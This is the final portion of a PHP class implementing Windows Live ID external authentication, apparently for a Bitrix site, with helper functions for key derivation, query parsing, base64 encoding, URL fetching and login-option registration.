if(function_exists('mhash'))
$key = mhash(MHASH_SHA256, $key);
else
$key = hash("sha256", $key, true);
if (!$key || (strlen($key) < $keyLen)) {
WindowsLiveLogin::debug("Error: derive: Unable to derive key.");
return;
}
return substr($key, 0, $keyLen);
}
/**
* Parses query string and returns a hash.
*
* If a hash ref is passed in from CGI->Var, it is dereferenced and
* returned.
*/
/*private*/
function parse($input)
{
if (!$input) {
WindowsLiveLogin::debug("Error: parse: Null input.");
return;
}
$input = explode('&', $input);
$pairs = array();
foreach ($input as $pair) {
$kv = explode('=', $pair);
if (count($kv) != 2) {
WindowsLiveLogin::debug("Error: parse: Bad input to parse: " . $pair);
return;
}
$pairs[$kv[0]] = $kv[1];
}
return $pairs;
}
/**
* Generates a time stamp suitable for the application verifier
* token.
*/
/*private*/
function getTimestamp()
{
return time();
}
/**
* Base64-encodes and URL-escapes a string.
*/
/*private*/
function e64($input)
{
if (is_null($input)) {
return;
}
return urlencode(base64_encode($input));
}
/**
* URL-unescapes and Base64-decodes a string.
*/
/*private*/
function u64($input)
{
if(is_null($input))
return;
return base64_decode(urldecode($input));
}
/**
* Fetches the contents given a URL.
*/
/*private*/
function fetch($url)
{
/*
if (!($handle = fopen($url, "rb"))) {
WindowsLiveLogin::debug("error: fetch: Could not open url: $url");
return;
}
if (!($contents = stream_get_contents($handle))) {
WindowsLiveLogin::debug("Error: fetch: Could not read from url: $url");
}
fclose($handle);
*/
//$str = $url."\n\n".$contents."\n\n\n";
//file_put_contents(__FILE__ . '.ftech.log', $str, FILE_APPEND);
$contents = CHTTP::sGet($url, false);
return $contents;
}
var $_error = false;
function setError($str)
{
$this->_error = $str;
}
function getError()
{
if ($this->_error !== false)
{
return $this->_error;
}
}
function OnExternalAuthList()
{
$arResult = Array();
if (
COption::GetOptionString('main', 'new_user_registration', 'Y') == 'Y' &&
COption::GetOptionString('main', 'auth_liveid', 'N') == 'Y'
)
{
$arResult[] = Array(
'ID' => 'LIVEID',
'NAME' => 'LiveID',
);
}
return $arResult;
}
function IsAvailable()
{
return function_exists('mcrypt_decrypt') && (function_exists('mhash') || function_exists('hash'));
}
}
?>